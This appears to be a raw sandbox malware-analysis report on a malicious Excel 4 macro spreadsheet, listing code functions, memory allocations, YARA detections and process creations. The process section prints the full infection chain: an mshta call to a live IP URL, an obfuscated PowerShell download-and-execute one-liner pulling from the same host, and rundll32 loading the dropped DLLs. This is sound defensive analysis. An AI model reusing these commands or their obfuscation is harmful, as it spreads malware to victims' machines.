                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00266C2912_2_00266C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027183112_2_00271831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026283012_2_00262830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027363D12_2_0027363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027561F12_2_0027561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00266A1F12_2_00266A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026B41A12_2_0026B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027686412_2_00276864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0028146E12_2_0028146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026E86A12_2_0026E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027026B12_2_0027026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0028086712_2_00280867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0028367212_2_00283672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00269A7D12_2_00269A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026CA4312_2_0026CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026E24312_2_0026E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027504012_2_00275040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026C85012_2_0026C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026865012_2_00268650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026608312_2_00266083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027CC8912_2_0027CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027109E12_2_0027109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027129C12_2_0027129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026AE9A12_2_0026AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002688F412_2_002688F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002764F112_2_002764F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002644FA12_2_002644FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00266ED612_2_00266ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027D8D712_2_0027D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027ACD312_2_0027ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002804DE12_2_002804DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002668DE12_2_002668DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026472E12_2_0026472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00270D3312_2_00270D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027FF3112_2_0027FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026BD0F12_2_0026BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026C30912_2_0026C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026911A12_2_0026911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026AB6612_2_0026AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00278D7112_2_00278D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026777B12_2_0026777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027094612_2_00270946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00273D4112_2_00273D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026194C12_2_0026194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026BB4B12_2_0026BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027A15612_2_0027A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00274B5612_2_00274B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026F15412_2_0026F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00280D5B12_2_00280D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027275312_2_00272753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026195012_2_00261950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002741A712_2_002741A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00262FA112_2_00262FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002799AA12_2_002799AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027C9A912_2_0027C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00263FB812_2_00263FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027918612_2_00279186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00267B8212_2_00267B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027C38F12_2_0027C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026F58F12_2_0026F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026FD8C12_2_0026FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0028199312_2_00281993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00261F9B12_2_00261F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00272BF612_2_00272BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027EBFF12_2_0027EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026CFCE12_2_0026CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002745CD12_2_002745CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00277BCA12_2_00277BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0027D3C812_2_0027D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00345CF914_2_00345CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033970014_2_00339700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033283014_2_00332830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034183114_2_00341831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034363D14_2_0034363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033B82114_2_0033B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00336C2914_2_00336C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034542E14_2_0034542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034A42914_2_0034A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033B41A14_2_0033B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034561F14_2_0034561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00336A1F14_2_00336A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0035367214_2_00353672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00339A7D14_2_00339A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034686414_2_00346864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0035086714_2_00350867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033E86A14_2_0033E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0035146E14_2_0035146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034026B14_2_0034026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033C85014_2_0033C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033865014_2_00338650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033CA4314_2_0033CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033E24314_2_0033E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034504014_2_00345040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003404B814_2_003404B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034EE9414_2_0034EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033EC9B14_2_0033EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034129C14_2_0034129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033AE9A14_2_0033AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034109E14_2_0034109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034E49814_2_0034E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033608314_2_00336083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034BE8C14_2_0034BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034CC8914_2_0034CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003464F114_2_003464F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003388F414_2_003388F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003344FA14_2_003344FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003370ED14_2_003370ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034D8D714_2_0034D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00336ED614_2_00336ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034ACD314_2_0034ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003474DD14_2_003474DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003504DE14_2_003504DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003368DE14_2_003368DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034FF3114_2_0034FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00340D3314_2_00340D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033F93D14_2_0033F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033472E14_2_0033472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034351214_2_00343512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033911A14_2_0033911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033C30914_2_0033C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033BD0F14_2_0033BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00348D7114_2_00348D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033777B14_2_0033777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033AB6614_2_0033AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00351B5414_2_00351B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034A15614_2_0034A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00344B5614_2_00344B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033195014_2_00331950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033F15414_2_0033F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034275314_2_00342753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00350D5B14_2_00350D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034094614_2_00340946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00343D4114_2_00343D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033BB4B14_2_0033BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033194C14_2_0033194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00333FB814_2_00333FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00332FA114_2_00332FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003441A714_2_003441A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034C9A914_2_0034C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003499AA14_2_003499AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034B39114_2_0034B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00338D9514_2_00338D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0035199314_2_00351993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00331F9B14_2_00331F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00337B8214_2_00337B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034918614_2_00349186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034C38F14_2_0034C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033F58F14_2_0033F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033FD8C14_2_0033FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00342BF614_2_00342BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034EBFF14_2_0034EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003445CD14_2_003445CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0034D3C814_2_0034D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0033CFCE14_2_0033CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00347BCA14_2_00347BCA
                            Source: 3DBB.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: 80_513972285.xlsMacro extractor: Sheet name: Macro1
                            Source: 80_513972285.xlsMacro extractor: Sheet name: Macro1
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0026C67D DeleteService,12_2_0026C67D
                            Source: 80_513972285.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: 80_513972285.xls, type: SAMPLEMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPEDMatched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Klovgjl\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: 80_513972285.xlsOLE indicator, VBA macros: true
                            Source: 80_513972285.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@2/36
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: 80_513972285.xlsOLE indicator, Workbook stream: true
                            Source: 80_513972285.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: 80_513972285.xlsReversingLabs: Detection: 33%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*D.k....................................}..v.....M......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................*D.k..... ..............................}..v....PN......0.................K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................E.k....................................}..v.....Z......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................E.k......K.............................}..v.... [......0...............(.K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................F.k....................................}..v....8.......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................F.k....X.K.............................}..v............0.................K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................].k....E...............................}..v....p'......0.................K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................].k....E...............................}..v.....e......0.................K.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.......:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADDJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiAJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtKJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB50.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
